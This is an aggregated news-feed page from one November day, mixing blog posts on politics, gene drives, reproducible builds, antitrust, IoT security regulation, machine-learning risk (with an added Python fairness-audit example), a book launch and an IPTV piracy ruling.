Tuesday, 13 November

16:35

Link [Scripting News]

As a language hacker I wonder if we could make a meme somehow happen where people think the word flake came from Jeff Flake instead of it being a coincidence.

16:28

Security updates for Tuesday [LWN.net]

Security updates have been issued by Debian (firmware-nonfree and imagemagick), Fedora (cabextract, icecast, and libmspack), openSUSE (icecast), Red Hat (httpd24), Slackware (libtiff), SUSE (apache-pdfbox, firefox, ImageMagick, and kernel), and Ubuntu (clamav, spamassassin, and systemd).

16:14

The Big Idea: Nancy Kress [Whatever]

Wiping out a terrible disease that kills millions each year: An unmitigated good, yes? Well, hold on there — Nancy Kress is here to explain how there are consequences to every action, and what those consequences mean for you, and her new novel, Terran Tomorrow.

NANCY KRESS:

Why should you care about gene drives?

Right now, I can see you thinking: I don’t! Next! But give me five minutes to explain why you should.

First, the five-second-or-so version (depending on how fast you read): Gene drives can, and soon will try to, eliminate an entire species.  Sparrows, wolves, mosquitos, and you are all species.

The five-minute version: A gene drive is an artificial “selfish gene” capable of forcing itself into 99% of an animal’s offspring, instead of the usual 50%. Theoretically, they could affect promoter genes, which are in charge of turning other genes on and off. In actuality so far, we know that they can affect reproduction by turning all males or females (pick one) of a species sterile. We know this because London researchers, supported in large part by the Gates Foundation, have succeeded in creating this gene drive in females of the malaria-carrying mosquito Anopheles gambiae, making them sterile. At the same time, as part of the international effort Target Malaria, a small field trial with sterile male Anopheles will begin in Burkina Faso by the end of 2018. If all goes well, Anopheles may eventually be eliminated, and with it malaria.

What if all does not go well?

What if it does?

What if the same technique is used to eliminate other species?

These are the places that hard science fiction looks for stories—the impact craters of major technological advances like gene drives. I write hard SF, and my new novel, Terran Tomorrow, is interested in the impacts, good and bad, of genetic engineering on the natural world. Since those impacts are made by people, Terran Tomorrow deals not only with how people mess around with genes but also, and more importantly, why.  For what good or bad reasons, under what circumstances, with what consequences. How do we clean up other people’s genetic messes? How do we clean up our own—and at what personal sacrifices? Science is much more about people than petri dishes.

Terran Tomorrow is the conclusion of my Tomorrow’s Kin trilogy, which began with the Nebula-winning novella “Yesterday’s Kin.”  In the first book, aliens came to Earth. In the second book, humans went to World. In this third book, humans and a few aliens return to Earth, and are startled and shocked by the changes since they left. Environmental changes, personal changes, a complete upending of the social order. Time dilation, if it brings a decade of genetic warfare, can do that.

Marianne Jenner, evolutionary biologist, is caught between the clashing philosophies of her now-grown grandsons, ecologist Colin Jenner and his brother, U.S. Army Colonel Jason Jenner. Geneticist Zack McKay and his fractious scientific team are trying under impossible conditions to create a planet-saving gene drive. Alien visitors are rebelling. So are ex-wives. A civil war rages. And sparrows are now deadly.

Sparrows? Yes, because, as I mentioned in the five-minute version of why gene drives matter, they can theoretically affect other genes besides those regulating the reproductive system. There are also promoter genes affecting various metabolic pathways in organs such as the brain.

In real life, scientists are exploring links between microglia, a form of brain cells, and both schizophrenia and Alzheimer’s, in which microglia don’t seem to be functioning optimally. Could a gene drive change that? Or cause it? What else in the brain can be permanently changed with a gene drive?

In Terran Tomorrow, people must confront and act on two of the most difficult questions in genetics: How much risk do we undertake in experimenting with the building blocks of life? And if others have experimented and the results are catastrophic, how much risk do we undertake trying to clean up their disaster?

There are no easy answers to those questions, not in real life nor in fiction. That’s what makes the questions worth doing what SF does best: rehearsing one possible future. Because gene drives are already here.

—-

Terran Tomorrow: Amazon|Barnes & Noble|Indiebound|Powell’s

Read an excerpt. Visit the author’s site. Follow her on Facebook.

 

15:49

Link [Scripting News]

It's somewhat embarrassing to have all those 0 Likes on my posts, but I'm going to leave them there. It's a worthwhile bootstrap imho. It can lead somewhere if we want it to.

Link [Scripting News]

Something bothered me about CNN's protest of their reporter being excluded from the White House. It took me a while to pinpoint. I guess they would like us to have their back -- but do they have ours? They do so many things that sell us out as they chase profit. It's as if they've found a way to monetize America's failure. Maybe one of these events will wake them up and they'll realize they aren't protected any more than we are, and they should do what they can to halt our descent, even if it makes them lose money. Until they do that, I don't see why I should care whose reporters are in the White House carrying the Republican message.

15:14

Saying good-bye to the original Microsoft Redmond campus [The Old New Thing]

The end is near for the original Microsoft Redmond campus. The nine buildings that formed the original campus are slated for demolition to make way for a new campus redesign. The buildings are making a final farewell tour this month, and last week, former Microsoft employees were invited back for one last hurrah in Building 2.

Not mentioned in the article is a sign posted in the front door of the building:

Building Closed

Access Restricted


What's Happening

This building is being prepared and made safe for demolition.

What this means to you.

You will no longer get lost trying to find the conference rooms.

Need help?

We appreciate your understanding and cooperation during this work. If you left any belongings or articles behind and wish to retrieve them please contact xxxxxx.

15:07

Link [Scripting News]

In January, House Dems should pass a bill that updates the Affordable Care Act to fix all that should have been fixed in 2014, and undoes the damage Repubs did. This is the platform for 2020.

Link [Scripting News]

I was just telling a friend about Al Pacino's speech in Any Given Sunday. I know a lot of people don't like sports movies but this one is the story of age, how the coach and the young quarterback (played by Jamie Foxx) learn to work together. It's got all the schmaltz of a typical sports movie. But the acting is so good, and the story simple and universal and heart-grabbing. Old people remember being young. We aren't young anymore, but we have experience and knowledge to offer, and when we work together the winning is so much sweeter. I would like the newly elected Democrat reps to watch this movie and work with Nancy Pelosi. She knows how to win. We have a really big problem to solve and we have to work together to solve it. If we don't work together, we'll die as individuals.

14:28

Reproducible builds folks: Reproducible Builds: Weekly report #185 [Planet Debian]

Here’s what happened in the Reproducible Builds effort between Sunday November 4 and Saturday November 10 2018:

Packages reviewed and fixed, and bugs filed

diffoscope development

diffoscope is our in-depth “diff-on-steroids” utility which helps us diagnose reproducibility issues in packages. This week, version 105 was uploaded to Debian unstable by Mattia Rizzolo. It included contributions already covered in previous weeks as well as new ones from:

Website updates

There were a large number of changes to our website this week:

In addition to that we had contributions from Deb Nicholson, Chris Lamb, Georg Faerber, Holger Levsen and Mattia Rizzolo et al. on the press release regarding joining the Software Freedom Conservancy:

Test framework development

There were a large number of updates to our Jenkins-based testing framework that powers tests.reproducible-builds.org by Holger Levsen this week (see below). The most important work was done behind the scenes outside of Git which was a long debugging session to find out why the Jenkins Java processes were suddenly consuming all of the system resources whilst the machine had a load of 60-200. This involved temporarily removing all 1,300 jobs, disabling plugins and other changes. In the end, it turned out that the underlying SSH/HDD performance was configured poorly and, after this was fixed, Jenkins returned to normal.

In addition, Mattia Rizzolo fixed an issue in the web-based package rescheduling tool by encoding a string before passing it to subprocess.run, and fixed the parsing of the “issue” selector option.


This week’s edition was written by Arnout Engelen, Bernhard M. Wiedemann, Chris Lamb, Holger Levsen, Oskar Wirga, Santiago Torres, Snahil Singh & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

14:14

Congressional Democrats' first bill aims to end gerrymandering, increase voter registration and rein in campaign finance [Cory Doctorow – Boing Boing]

HR1, the first bill that the new Democratic House of Representatives will vote on, is omnibus legislation that takes on some of the most pervasive scourges of representative democracy: vote suppression, oligarchic campaign financing and gerrymandering.

Under HR1's provisions, electoral districting will be taken away from state legislatures and handed to independent commissions (this is very popular with the American public and similar ballot initiatives just sailed into law in Colorado, Missouri and Michigan).

HR1 provides for automatic voter registration and reestablishes provisions from the Voting Rights Act that the Supreme Court neutered in 2013 (though as Yves notes at Naked Capitalism, "If they actually cared about voter turnout they would push election day registration which, unlike automatic registration, has been shown to increase turnout by around 5%").

HR1 also overturns Citizens United (previously), the 2010 Supreme Court decision that opened the floodgates to unlimited, oligarchic campaign spending, including hundreds of millions in "dark money" funneled into Super-PACs.

HR1 doesn't stop there: it also closes a loophole that exempts presidents from conflict of interest rules (a loophole that Trump has enthusiastically exploited).

It's not clear how the bill will fare; Senate Republicans are likely to be divided on it, and the provisions that override the Supreme Court are unlikely to find a hospitable reception in the current court.

But as a stake in the ground, it's a pretty impressive outing: forcing GOP politicians to vote in favor of dark money, gerrymandering, and allowing for presidential conflict-of-interest will give the Democrats a lot to campaign on in 2020.

"It's three very basic things that I think the public wants to see," said Rep. John Sarbanes (D-Md.), who spearheads campaign finance and government ethics efforts for the House Democratic Caucus. He said H.R. 1 will "demonstrate that we hear that message loud and clear."

But even Sarbanes admits the quick vote is just a first step. Republicans, who control the Senate, are unlikely to pass the bill and President Trump is unlikely to sign it. "Give us the gavel in the Senate in 2020 and we'll pass it in the Senate," Sarbanes said. "Give us a pen in the Oval Office and we'll sign those kinds of reforms into law."

The bill would establish automatic voter registration and reinvigorate the Voting Rights Act, crippled by a Supreme Court decision in 2013. It would take away redistricting power from state legislatures and give it to independent commissions.

Other provisions would overturn the Supreme Court's Citizens United ruling, which declared political spending is First Amendment free speech; they would mandate more disclosure of outside money and establish a public financing match for small contributions.

Democrats Say Their First Bill Will Focus On Strengthening Democracy At Home [Peter Overby/NPR]

(via Naked Capitalism)

(Image: Kheel Center, CC-BY)

Common sense: the Chomsky/Piaget debates come to AI [Cory Doctorow – Boing Boing]

In 1975, Noam Chomsky and Jean Piaget held a historic debate about the nature of human cognition; Chomsky held that babies are born with a bunch of in-built rules and instincts that help them build up the knowledge that they need to navigate the world; Piaget argued that babies are effectively blank slates that acquire knowledge from experiencing the world (including the knowledge that there is a thing called "experience" and "the world").

For most of AI's history, Chomsky's approach prevailed: computer scientists painstakingly tried to equip computers with a baseline of knowledge about the relationships between things in the world, hoping that computers would some day build up from this base to construct complex, powerful reasoning systems.

The current machine learning revolution can be traced to a jettisoning of this approach in favor of a Piaget-style blank slate, where layers of neural nets are trained on massive corpuses of data (sometimes labeled by hand, but often completely blank) and use equally massive computation to make sense of the data, creating their own understanding of the world.

Piaget-style deep learning has taken AI a long way in a short time, but it's hitting a wall. It's not just the weird and vastly entertaining local optima that these systems get stuck in: it's the huge corpuses of data needed to train them and the inability of machine learning to generalize one model to bootstrap another and another.

The fall-off in the rate of progress in machine learning, combined with the excitement that ML's recent gains provoked, has breathed new life into the Chomskyian approach to ML, and computer scientists all over the world are trying to create "common sense" corpuses of knowledge that they can imbue machine learning systems with before they are exposed to training data.

This approach seems to be hurdling some of the walls that stopped the Piaget-style ML. Some Chomskyian ML models attained a high degree of efficiency with much smaller training data sets.

Frequent Boing Boing contributor Clive Thompson's long piece on the state of the Chomsky/Piaget debate in ML is an excellent read, and really comes to the (retrospectively) obvious conclusion: it doesn't really matter whether Chomsky or Piaget are right about how kids learn, because each of them is right about how computers learn -- a little from Column A, a little from Column B.

But a bit of hand coding could be how you replicate some of the built-in knowledge that, according to the Chomskyite view, human brains possess. That’s what Dileep George and the Vicarious researchers did with Breakout. To create an AI that wouldn’t get stumped by changes to the layout of the game, they abandoned deep learning and built a system that included hard-coded basic assumptions. Without too much trouble, George tells me, their AI learned “that there are objects, and there are interactions between objects, and that the motion of one object can be causally explained between the object and something else.”

As it played Breakout, the system developed the ability to weigh different courses of action and their likely outcomes. This worked in reverse too. If the AI wanted to break a block in the far left corner of the screen, it reasoned to put the paddle in the far right corner. Crucially, this meant that when Vicarious changed the layout of the game—adding new bricks or raising the paddle—the system compensated. It appeared to have extracted some general understanding about Breakout itself.

Granted, there are trade-offs in this type of AI engineering. It’s arguably more painstaking to craft and takes careful planning to figure out precisely what foreordained logic to feed into the system. It’s also hard to strike the right balance of speed and accuracy when designing a new system. George says he looks for the minimum set of data “to put into the model so it can learn quickly.” The fewer assumptions you need, the more efficiently the machine will make decisions. Once you’ve trained a deep-learning model to recognize cats, you can show it a Russian blue it has never seen and it renders the verdict—it’s a cat!—almost instantaneously. Having processed millions of photos, it knows not only what makes a cat a cat but also the fastest way to identify one. In contrast, Vicarious’ style of AI is slower, because it’s actively making logical inferences as it goes.

How to Teach Artificial Intelligence Some Common Sense [Clive Thompson/Wired]

13:28

Big Tech got big because we stopped enforcing antitrust law (not because tech is intrinsically monopolistic) [Cory Doctorow – Boing Boing]

Tim Wu (previously) is a legal scholar best known for coining the term "Net Neutrality" -- his next book, The Curse of Bigness: Antitrust in the New Gilded Age (previously) challenges the accepted wisdom about today's digital monopolists, which is that they grew so big because of some underlying truth about online business ("first-mover advantage," "network effects," "globalism," etc). Instead, Wu argues that the reason we got digital monopolies is that we stopped enforcing anti-monopoly rules against digital companies (and then against all kinds of companies).

In a new excerpt from "The Curse of Bigness" published today on Wired, Wu fleshes out this argument in more depth, with a fast-moving history of how regulators were lulled into a belief in the especially competitive markets in technology because of the quick rise and fall of companies like AOL, leading to a hands-off approach to regulating the tech markets that allowed for the rise and rise of companies like Google and Facebook.

I'm looking forward to reading the rest of the book -- it's obvious that while these special theories of tech's intrinsic competitiveness were key to lulling regulators to sleep during the 2000s and 2010s, the theories also dovetailed with a modern economic orthodoxy from the University of Chicago that held that unless companies were raising prices, there was no reason to limit their actions.

Unfortunately, antitrust law failed to notice that the 1990s were over. Instead, for a decade and counting, it gave the major tech players a pass—even when confronting fairly obvious dangers and anticompetitive mergers. That is best exemplified by the Facebook story. Launched in 2004, Facebook quickly dispatched its rival, MySpace, which had been a rare Los Angeles tech-success story but had become a mess of intrusive advertising, fake users, and trolls. In just a few years, Facebook achieved an early dominance over general-purpose social networking.

But by the 2010s, Facebook faced one of its most serious challengers, a startup named Instagram. Instagram combined a camera app with a social network on which it was easy and fast to share photos on mobile. It was popular with younger people, and it was not long before some of its advantages over Facebook were noticed. As business writer Nicholas Carlson said at the time, Instagram “allows people to do what they like to do on Facebook easier and faster.”

Having already gained 30 million users in just 18 months of existence, Instagram was poised to become a leading challenger to Facebook based on its strength on mobile platforms, where Facebook was weak. By the doctrine of internet time, Facebook, then eight years old, was supposed to be heading into retirement.

How Google and Amazon Got Away With Not Being Regulated [Tim Wu/Wired]

13:21

New IoT Security Regulations [Schneier on Security]

Due to ever-evolving technological advances, manufacturers are connecting consumer goods -- from toys to light bulbs to major appliances -- to the Internet at breakneck speeds. This is the Internet of Things, and it's a security nightmare.

The Internet of Things fuses products with communications technology to make daily life more effortless. Think Amazon's Alexa, which not only answers questions and plays music but allows you to control your home's lights and thermostat. Or the current generation of implanted pacemakers, which can both receive commands and send information to doctors over the Internet.

But like nearly all innovation, there are risks involved. And for products born out of the Internet of Things, this means the risk of having personal information stolen or devices being overtaken and controlled remotely. For devices that affect the world in a direct physical manner -- cars, pacemakers, thermostats -- the risks include loss of life and property.

By developing more advanced security features and building them into these products, hacks can be avoided. The problem is that there is no monetary incentive for companies to invest in the cybersecurity measures needed to keep their products secure. Consumers will buy products without proper security features, unaware that their information is vulnerable. And current liability laws make it hard to hold companies accountable for shoddy software security.

It falls upon lawmakers to create laws that protect consumers. While the US government is largely absent in this area of consumer protection, the state of California has recently stepped in and started regulating the Internet of Things, or "IoT" devices sold in the state -- and the effects will soon be felt worldwide.

California's new SB 327 law, which will take effect in January 2020, requires all "connected devices" to have a "reasonable security feature." The good news is that the term "connected devices" is broadly defined to include just about everything connected to the Internet. The not-so-good news is that "reasonable security" remains defined such that companies trying to avoid compliance can argue that the law is unenforceable.

The legislation requires that security features must be able to protect the device and the information on it from a variety of threats and be appropriate to both the nature of the device and the information it collects. California's attorney general will interpret the law and define the specifics, which will surely be the subject of much lobbying by tech companies.

There's just one specific in the law that's not subject to the attorney general's interpretation: default passwords are not allowed. This is a good thing; they are a terrible security practice. But it's just one of dozens of awful "security" measures commonly found in IoT devices.

This law is not a panacea. But we have to start somewhere, and it is a start.

Though the legislation covers only the state of California, its effects will reach much further. All of us -- in the United States or elsewhere -- are likely to benefit because of the way software is written and sold.

Automobile manufacturers sell their cars worldwide, but they are customized for local markets. The car you buy in the United States is different from the same model sold in Mexico, because the local environmental laws are not the same and manufacturers optimize engines based on where the product will be sold. The economics of building and selling automobiles easily allows for this differentiation.

But software is different. Once California forces minimum security standards on IoT devices, manufacturers will have to rewrite their software to comply. At that point, it won't make sense to have two versions: one for California and another for everywhere else. It's much easier to maintain the single, more secure version and sell it everywhere.

The European General Data Protection Regulation (GDPR), which implemented the annoying warnings and agreements that pop up on websites, is another example of a law that extends well beyond physical borders. You might have noticed an increase in websites that force you to acknowledge you've read and agreed to the website's privacy policies. This is because it is tricky to differentiate between users who are subject to the protections of the GDPR -- people physically in the European Union, and EU citizens wherever they are -- and those who are not. It's easier to extend the protection to everyone.

Once this kind of sorting is possible, companies will, in all likelihood, return to their profitable surveillance capitalism practices on those who are still fair game. Surveillance is still the primary business model of the Internet, and companies want to spy on us and our activities as much as they can so they can sell us more things and monetize what they know about our behavior.

Insecurity is profitable only if you can get away with it worldwide. Once you can't, you might as well make a virtue out of necessity. So everyone will benefit from the California regulation, as they would from similar security regulations enacted in any market around the world large enough to matter, just like everyone will benefit from the portion of GDPR compliance that involves data security.

Most importantly, laws like these spur innovations in cybersecurity. Right now, we have a market failure. Because the courts have traditionally not held software manufacturers liable for vulnerabilities, and because consumers don't have the expertise to differentiate between a secure product and an insecure one, manufacturers have prioritized low prices, getting devices out on the market quickly and additional features over security.

But once a government steps in and imposes more stringent security regulations, companies have an incentive to meet those standards as quickly, cheaply, and effectively as possible. This means more security innovation, because now there's a market for new ideas and new products. We've seen this pattern again and again in safety and security engineering, and we'll see it with the Internet of Things as well.

IoT devices are more dangerous than our traditional computers because they sense the world around us, and affect that world in a direct physical manner. Increasing the cybersecurity of these devices is paramount, and it's heartening to see both individual states and the European Union step in where the US federal government is abdicating responsibility. But we need more, and soon.

This essay previously appeared on CNN.com.

12:49

Four short links: 13 November 2018 [All - O'Reilly Media]

Ways of Working, Too-Smart AI, Wi-Fi Vision, and Materials Science AI

  1. Internet-Era Ways of Working -- an elegant brief summary of how we do software in 2018, from Tom Loosemore's public.digital team.
  2. Examples of AI Gaming the System -- a list of examples of AIs learning more than was intended. Neural nets evolved to classify edible and poisonous mushrooms, took advantage of the data being presented in alternating order, and didn't actually learn any features of the input images. (via BoingBoing)
  3. Using Wi-Fi to “See” Behind Closed Doors is Easier than Anyone Thought (MIT TR) -- if all you are interested in is the movement of people. Humans also reflect and distort this Wi-Fi light. The distortion, and the way it moves, would be clearly visible through Wi-Fi eyes, even though the other details would be smeared. This crazy Wi-Fi vision would clearly reveal whether anybody was behind a wall and, if so, whether the person was moving. That’s the basis of Zhu and co’s Wi-Fi-based peeping tom. It looks for changes in an ordinary Wi-Fi signal that reveal the presence of humans.
  4. Learning Process-Structure-Property Relations -- clever research project that mines research literature to learn relationships about the physical properties and processes in materials science, then automatically generates a diagram for the particular constraints your project has. Code released as open source.

Continue reading Four short links: 13 November 2018.

Managing risk in machine learning [All - O'Reilly Media]

Considerations for a world where ML models are becoming mission critical.

In this post, I share slides and notes from a keynote I gave at the Strata Data Conference in New York last September. As the data community begins to deploy more machine learning (ML) models, I wanted to review some important considerations.

Let’s begin by looking at the state of adoption. We recently conducted a survey which garnered more than 11,000 respondents—our main goal was to ascertain how enterprises were using machine learning. One of the things we learned was that many companies are still in the early stages of deploying machine learning (ML):

(Figure: deploying machine learning)

As far as reasons for companies holding back, we found from a survey we conducted earlier this year that companies cited lack of skilled people, a “skills gap,” as the main challenge holding back adoption.

Interest on the part of companies means the demand side for “machine learning talent” is healthy. Developers have taken notice and are beginning to learn about ML. In our own online training platform (which has more than 2.1 million users), we’re finding strong interest in machine learning topics. Below are the top search topics on our training platform:

(Figure: machine learning training)

Beyond “search,” note that we’re seeing strong growth in consumption of content related to ML across all formats—books, posts, video, and training.

Before I continue, it’s important to emphasize that machine learning is much more than building models. You need to have the culture, processes, and infrastructure in place before you can deploy many models into products and services. At the recent Strata Data conference we had a series of talks on relevant cultural, organizational, and engineering topics. Here's a list of a few clusters of relevant sessions from the recent conference:

Over the last 12-18 months, companies that use a lot of ML and employ teams of data scientists have been describing their internal data science platforms (see, for example, Uber, Netflix, Twitter, and Facebook). They share some of the features I list below, including support for multiple ML libraries and frameworks, notebooks, scheduling, and collaboration. Some companies include advanced capabilities, including a way for data scientists to share features used in ML models, tools that can automatically search through potential models, and some platforms even have model deployment capabilities:

(Figure: machine learning model deployment capabilities)

As you get beyond prototyping and you actually begin to deploy ML models, there are many challenges that will arise as those models begin to interact with real users or devices. David Talby summarized some of these key challenges in a recent post:

  • Your models may start degrading in accuracy
  • Models will need to be customized (for specific locations, cultural settings, domains, and applications)
  • Real modeling begins once in production

There are also many important considerations that go beyond optimizing a statistical or quantitative metric. For instance, there are certain areas—such as credit scoring or health care—that require a model to be explainable. In certain application domains (including autonomous vehicles or medical applications), safety and error estimates are paramount. As we deploy ML in many real-world contexts, optimizing statistical or business metrics alone will not suffice. The data science community has been increasingly engaged in two topics I want to cover in the rest of this post: privacy and fairness in machine learning.

Privacy and security

Given the growing interest in data privacy among users and regulators, there is a lot of interest in tools that will enable you to build ML models while protecting data privacy. These tools rely on building blocks, and we are beginning to see working systems that combine many of these building blocks. Some of these tools are open source and are becoming available for use by the broader data community:

  • Federated learning is useful when you want to collaborate and build a centralized model without sharing private data. It’s used in production at Google, but we still are in need of tools to make federated learning broadly accessible.
  • We’re starting to see tools that allow you to build models while guaranteeing differential privacy, one of the most popular and powerful definitions of privacy. At a high level, these methods inject random noise at different stages of the model building process. These emerging sets of tools aim to be accessible to data scientists who are already using libraries such as scikit-learn and TensorFlow. The hope is that data scientists will soon be able to routinely build differentially private models.
  • There’s a small and growing number of researchers and entrepreneurs who are investigating whether we can build or use machine learning models on encrypted data. This past year, we’ve seen open source libraries (HElib and Palisade) for fast homomorphic encryption, and we have startups that are building machine learning tools and services on top of those libraries. The main bottleneck here is speed: many researchers are actively investigating hardware and software tools that can speed up model inference (and perhaps even model building) on encrypted data.
  • Secure multi-party computation is another promising class of techniques used in this area.

Fairness

Now let’s consider fairness. Over the last couple of years, many ML researchers and practitioners have started investigating and developing tools that can help ensure ML models are fair and just. Just the other day, I searched Google for recent news stories about AI, and I was surprised by the number of articles that touch on fairness.

For the rest of this section, let’s assume one is building a classifier and that certain variables are considered “protected attributes” (this can include things like age, ethnicity, gender, ...). It turns out that the ML research community has used numerous mathematical criteria to define what it means for a classifier to be fair. Fortunately, a recent survey paper from Stanford—A Critical Review of Fair Machine Learning—simplifies these criteria and groups them into the following types of measures:

  • Anti-classification means the omission of protected attributes and their proxies from the model or classifier.
  • Classification parity means that one or more of the standard performance measures (e.g., false positive and false negative rates, precision, recall) are the same across groups defined by the protected attributes.
  • Calibration: If an algorithm produces a “score,” that “score” should mean the same thing for different groups.
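Each of the three criteria above can be checked mechanically, which is where an independent validator would start. The following is an added example, not code from the original post or the Stanford paper; the records, group names, feature names, proxy list, 0.5 threshold and 0.05 tolerance are all constructed assumptions.

```python
from collections import defaultdict

# Constructed sample records: (group, model score, actual outcome). Not real data.
RECORDS = (
    [("A", s, y) for s, y in [(0.9, 1), (0.8, 1), (0.7, 0), (0.6, 1),
                              (0.4, 0), (0.3, 0), (0.2, 1), (0.1, 0)]]
    + [("B", s, y) for s, y in [(0.9, 1), (0.8, 0), (0.7, 0), (0.6, 1),
                                (0.4, 0), (0.3, 0), (0.2, 0), (0.1, 0)]]
)


def anti_classification_violations(features, protected, proxies):
    """Model inputs that are protected attributes or declared proxies for one."""
    return sorted(f for f in features if f in protected or f in proxies)


def error_rates(records, threshold=0.5):
    """Per-group false positive and false negative rates at a decision threshold."""
    counts = defaultdict(lambda: {"fp": 0, "tn": 0, "fn": 0, "tp": 0})
    for group, score, actual in records:
        predicted = score >= threshold
        if actual:
            key = "tp" if predicted else "fn"
        else:
            key = "fp" if predicted else "tn"
        counts[group][key] += 1
    rates = {}
    for group, c in counts.items():
        negatives = c["fp"] + c["tn"]
        positives = c["fn"] + c["tp"]
        # A group with no negatives (or positives) has an undefined rate.
        rates[group] = {
            "fpr": c["fp"] / negatives if negatives else None,
            "fnr": c["fn"] / positives if positives else None,
        }
    return rates


def parity_gap(rates, metric):
    """Classification parity: largest difference in one metric between groups."""
    values = [r[metric] for r in rates.values() if r[metric] is not None]
    return max(values) - min(values) if len(values) > 1 else 0.0


def calibration_table(records, bins=2):
    """Observed positive rate per (group, score bin)."""
    cells = defaultdict(lambda: [0, 0])  # (group, bin) -> [positives, total]
    for group, score, actual in records:
        b = min(int(score * bins), bins - 1)  # a score of 1.0 goes in the top bin
        cells[(group, b)][0] += actual
        cells[(group, b)][1] += 1
    return {key: pos / total for key, (pos, total) in cells.items()}


def calibration_gap(table, bins=2):
    """Calibration: worst per-bin spread of observed rates across groups."""
    worst = 0.0
    for b in range(bins):
        observed = [rate for (_, bin_), rate in table.items() if bin_ == b]
        if len(observed) > 1:
            worst = max(worst, max(observed) - min(observed))
    return worst


def audit(records, features, protected, proxies, tolerance=0.05):
    """Findings for a validator to review; an empty list is not proof of fairness."""
    findings = [f"input '{f}' is protected or a proxy"
                for f in anti_classification_violations(features, protected, proxies)]
    rates = error_rates(records)
    for metric in ("fpr", "fnr"):
        gap = parity_gap(rates, metric)
        if gap > tolerance:
            findings.append(f"{metric} differs across groups by {gap:.2f}")
    gap = calibration_gap(calibration_table(records))
    if gap > tolerance:
        findings.append(f"same score bin differs in observed rate by {gap:.2f}")
    return findings


if __name__ == "__main__":
    for line in audit(RECORDS, ["income", "zip_code", "age"],
                      protected={"age", "gender", "ethnicity"},
                      proxies={"zip_code"}):
        print(line)
```

On this sample, a score in the upper bin corresponds to a 75% observed rate for group A and 50% for group B, so the same score does not mean the same thing for both groups.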

However, as the authors from Stanford point out in their paper, each of the mathematical formulations described above suffers from limitations. With respect to fairness, there is no black box or series of procedures that you can stick your algorithm into that can give it a clean bill of health. There is no such thing as a “one size, fits all” procedure.

Because there’s no ironclad procedure, you will need a team of humans-in-the-loop. Notions of fairness are not only domain and context sensitive, but as researchers from UC Berkeley recently pointed out, there is a temporal dimension as well (“We advocate for a view toward long-term outcomes in the discussion of ‘fair’ machine learning”). What is needed are data scientists who can interrogate the data and understand the underlying distributions, working alongside domain experts who can evaluate models holistically.

Culture and organization

As we deploy more models, it’s becoming clear that we will need to think beyond optimizing statistical and business metrics. While I haven’t touched on them during this short post, it’s clear that reliability and safety are going to be extremely important moving forward. How do you build and organize your team in a world where ML models have to take many other important things under consideration?

Fortunately there are members of our data community who have been thinking about these problems. The Future of Privacy Forum and Immuta recently released a report with some great suggestions on how one might approach machine learning projects with risk management in mind:

  • When you’re working on a machine learning project, you need to employ a mix of data engineers, data scientists, and domain experts.
  • One important change outlined in the report is the need for a set of data scientists who are independent from this model-building team. This team of “validators” can then be tasked with evaluating the ML model on things like explainability, privacy, and fairness.

Closing remarks

So, what skills will be needed in a world where ML models are becoming mission critical? As noted above, fairness audits will require a mix of data and domain experts. In fact, a recent analysis of job postings from NBER found that compared with other data analysis skills, machine learning skills tend to be bundled with domain knowledge.

But you’ll also need to supplement your data and domain experts with legal and security experts. Moving forward, we’ll need to have legal, compliance, and security people working more closely with data scientists and data engineers.

This shouldn’t come as a shock: we already invest in desktop security, web security, and mobile security. If machine learning is going to eat software, we will need to grapple with AI and ML security, too.

Continue reading Managing risk in machine learning.

[1044] Family Reunion [Twokinds]

Comic for November 13, 2018

12:35

Representative Line: An Equal Crunch [The Daily WTF]

Rina works in an environment which tends to favor crunch. It's a bit of a feast or famine situation, where they'll coast for months on a pretty standard 9-5 schedule, and then bam, suddenly...

11:42

The magic of a book launch [Seth's Blog]

Today is launch day for my new book. Thanks to fast-clicking readers and alumni, it’s already a bestseller. You can check out some of the advance reviews. And the Financial Times picked it one of November’s books of the month. And 800CEOREAD just long listed it as one of the best marketing books of the year…

Lots of cool surprises in this post, just for you and my other favorite blog readers…

For the first time, we’re hosting an online launch party. If you grab a copy in the next two weeks, we’d love to have you join us.

The launch party will feature exclusive videos from me expanding on ideas in the book, an ongoing Q&A session and most of all, a chance to connect with thousands of other alumni of our online seminar and the purchasers of the book as well. You’ll find a cohort of fascinating and generous people there, and my hope is that if you’re an eager contributor to the party, you’ll find that it’s even worth more than the cost of the book itself.

If you’re an early adopter, the kind of person who goes first, you’re our kind of person. Join the launch party to meet more people like us. If you get a copy in the next week or so, you can join in. Sign up here.

The launch party is free to join for readers. Once you buy a copy of the book, you’ll find a code on the bottom of page 260 (or in the Kindle edition, at the end of the acknowledgments) that will get you into the Party. If you’re listening on audio, use the link at the bottom of the page.

One more thing…

Along the way, we’ve created:

An action figure, a milk carton, a cereal box, not one but two books that each weighed 17 pounds, a wooden boxed set, a letterpress poster and many more–and each sold out. All created at breakeven, all for fun, all for the true fans. Your chance to have something that almost no one else does.

And the new one is fun indeed:

Find out more about the collectible here.

There are only 2,000 of them in the warehouse, and we’re not going to make any more. I hope you’ll check it out before they’re all gone. There are 19 different covers packed in four different sets of 8… see if you can collect them all.

And what will you do with those 7 extra books, the ones that come with a limited-edition custom cover?

I’m hoping you’ll share them.

You might share them with co-workers because you know that if you can all get on the same page, your marketing will work better and you’ll be more likely to be able to do work you’re proud of.

You could share them with non-profit leaders or political leaders, because you want their work to spread.

And perhaps you’ll share them with your students, your friends or those you admire, because now’s the best time to make a ruckus.

Person to person, horizontally.

Making the covers and the custom box and the rest of it was thrilling, and I can’t thank you enough for letting us do this work. Highlights from the book in tomorrow’s post…

10:35

SETTV IPTV Service Ordered to Pay DISH $90,000,000 in Piracy Damages [TorrentFreak]

Back in April, the Alliance for Creativity and Entertainment, the global anti-piracy alliance featuring several Hollywood studios, Amazon, Netflix, and dozens of other entertainment companies, sued Florida-based SET Broadcast, LLC.

The popular unauthorized IPTV was accused of being a piracy tool offering copyright-infringing streams to a large number of subscribers. Early June, SETTV went offline after a second lawsuit was filed against the company.

In a Florida court, DISH Network and encryption partner NagraStar sued several individuals, companies and trusts collectively doing business as SETTV via the domain SETTVNOW.com. The plaintiffs stated that the complex business structure was designed to frustrate enforcement efforts and hide profits made by SET Broadcast and various individuals.

“Defendants created a pirate streaming television service they have branded ‘SET TV’,” the complaint reads, citing offenses under the Federal Communications Act (FCA).

“Defendants sell subscriptions and devices for the SET TV pirate streaming service, which includes numerous television channels that were received without authorization from DISH’s satellite service and were subsequently retransmitted without authorization on the SET TV pirate streaming service.”

